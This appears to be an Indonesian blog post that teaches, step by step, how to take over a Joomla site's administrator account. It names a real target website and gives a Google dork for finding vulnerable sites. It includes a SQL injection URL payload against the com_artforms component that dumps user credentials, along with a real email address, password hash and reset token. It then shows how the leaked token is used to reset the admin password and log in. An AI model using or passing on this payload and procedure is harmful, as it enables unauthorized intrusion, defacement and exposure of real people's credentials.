Cara Defae Joomla 1
10:10:00 PM
By
ali sahidin
0
comments
targetnya
cari di google
pake dork ini
option com_artforms
kita dapat target yaitu :
http://www.opera-verona.it/
di exploid
ni kodenya di paste
/index.php?option=com_artforms&task=vferforms&id=1 UNION SELECT 1,2,3,version(),5,concat_ws(0x3a,activation,0x3a,email,0x3a,username,0x3a,password)+from+jos_users
menjadi
http://www.opera-verona.it/http://index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,2,3,version%28%29,5,concat_ws%280x3a,activation,0x3a,email,0x3a,username,0x3a,password%29+from+jos_users
disitu udah kelihatan emailnya
d.giardini@ideaverona.com
dari
:::d.giardini@ideaverona.com:::admin:::dc7edcfda44d880f8a0e5e828675ed0a:kkATnYtNP3YDlrFilCAxnt89yrvHw4mi
terus
copy code reset pass ini
index.php?option=com_user&view=reset
buka tab baru
http://www.opera-verona.it/
terus masukin kode reset paswordnya menjadi seperti ini :
http://www.centroanagnina.com/web/index.php?option=com_user&view=reset
setelah itu disuruh masukin email nantinya
masukin email yg kita dapat tadi
yaitu
d.giardini@ideaverona.com
enter
setelah di enter
anda disuruh masukin code :
kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi
(kita reload ya ) kalo ga tw reload tekan F5 di komputer ))
http://www.opera-verona.it//index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,2,3,version%28%29,5,concat_ws%280x3a,activation,0x3a,email,0x3a,username,0x3a,password%29+from+jos_users
disitu kita melihat code :
Form disponibili: 2
eda7d6142fac40a533b56407a4617371:::d.giardini@ideaverona.com:::admin:::dc7edcfda44d880f8a0e5e828675ed0a:kkATnYtNP3YDlrFilCAxnt89yrvHw4mi
kodenya :
eda7d6142fac40a533b56407a4617371
setelah kita lihat kode tadi kita kembali ke halaman
http://www.opera-verona.it/index.php?option=com_user&view=reset&layout=confirm
untuk memasukan kode
eda7d6142fac40a533b56407a4617371
setelah kita masukin kode
kita enter
setelah enter
nanti kita disitu tersedia 2 kotak yg harus di isi
(disuruh masukin pasword and verify pasword)
masukin pasword yg anda inginkan
misalkankitamasukin
pasword : alisahidin
dandi veryfikasinya : alisahidin
setelah itu enter
setelah enter disitu kita disuruh masukin nama dan pasword
kita lewatin aja
dan kita masuk ke tabe baru lagi
( http://web target/administrator/)
http://www.opera-verona.it/administrator/
setelah buka kita disuruh masukin nama dan pasword
nama kita lihat di halaman yg kita reload tadi yg ini
http://www.opera-verona.it/http://index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,2,3,version%28%29,5,concat_ws%280x3a,activation,0x3a,email,0x3a,username,0x3a,password%29+from+jos_users
disitu kita dapat
:::d.giardini@ideaverona.com:::admin:::dc7edcfda44d880f8a0e5e828675ed0a:kkATnYtNP3YDlrFilCAxnt89yrvHw4mi
nah nama yg kita maksud adalah :
admin
kita kembali ke halaman
http://www.opera-verona.it/administrator/
dan kita
masukin admin
dan paswordnya adalah
alisahidin (pasword yg kita buat tadi)
udah sekarang jadi deh
kita masuk ke halaman administrator mereka
0 comments: